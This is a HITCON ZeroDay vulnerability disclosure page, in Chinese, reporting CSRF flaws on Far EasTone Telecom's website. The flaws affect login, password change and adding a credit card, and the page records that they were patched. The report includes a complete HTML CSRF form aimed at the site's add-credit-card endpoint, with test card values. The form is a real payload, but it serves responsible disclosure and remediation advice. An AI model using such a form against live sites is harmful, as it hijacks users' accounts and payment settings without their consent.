遠傳電信 CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-00651
  •  發信 Vendor: 遠傳電信
  • Title: 遠傳電信 CSRF
  • Introduction: CSRF

處理狀態

目前狀態

公開
Last Update : 2019/08/22
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2019/07/06 19:54:34 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:00:59 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:13:59 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:14:19 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:15:14 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:15:41 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:41:18 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:41:55 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:42:55 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:44:48 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/06 20:49:27 : 新提交 (由 SomeApple 更新此狀態)
  • 2019/07/07 23:04:20 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/07/07 23:04:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/07/12 00:21:07 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/07/12 00:21:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/07/12 00:21:08 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/08/15 14:28:41 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2019/08/18 21:15:16 : 確認已修補 (由 SomeApple 更新此狀態)
  • 2019/08/22 03:00:14 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-00651
  • 通報者:jk82421 (SomeApple)
  • 風險:低
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://login.fetnet.net/hlogin/eaiapp/loginAuth
https://www.fetnet.net/mycenter/change-user-password
https://www.fetnet.net/dspservice/myCenter/paymentTool/ajaxSet3dPayment/C

敘述

一開始遠傳官網是處於無登入狀態
圖片

透過把相關資訊複製到本地端組建出表單送出
圖片

送出後被跳回官網
圖片

此時重新按下登入按鈕,就會變成登入狀態
圖片

接下來測試更改密碼功能
圖片

用本地端組建的表單成功更改
圖片

使用新密碼登入成功
圖片
圖片

還有類似新增信用卡功能也會有 CSRF 的問題出現
URL: https://www.fetnet.net/dspservice/myCenter/paymentTool/ajaxSet3dPayment/C
Payload:

<form action="https://www.fetnet.net/dspservice/myCenter/paymentTool/ajaxSet3dPayment/C" method="POST">
    updateId
    <input type="text" name="updateId"/>
    isGlobal
    <input type="text" name="isGlobal"/>
    isDefault
    <input type="text" name="isDefault"/>
    expireYm
    <input type="text" name="expireYm"/>
    pan1
    <input type="text" name="pan1" value="4242"/>
    pan2
    <input type="text" name="pan2" value="4242"/>
    pan3
    <input type="text" name="pan3" value="4242"/>
    pan4
    <input type="text" name="pan4" value="4242"/>
    mm
    <input type="text" name="mm" value="07"/>
    yyyy
    <input type="text" name="yyyy" value="2019"/>
    cvv2
    <input type="text" name="cvv2" value="123"/>
    cardName
    <input type="text" name="cardName" value="124123"/>
    <button type="submit">新增信用卡</button>
</form>

圖片
圖片

因為在打錯卡號的狀況下錯誤訊息是 (圖片有上限無法上傳)
Invalid parameter value (credit card info)(ccInfo.cardNo)
但卡號格式改對之後,錯誤訊息就變成 Foreign card is not allowed ,從這可以知道
這張卡是有被丟到系統做驗證的,所以如果輸入的是一張真實可以用的卡號就可以新增進去了

修補建議

1. 加上 google robot
2. 為每一次請求加上 request token

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;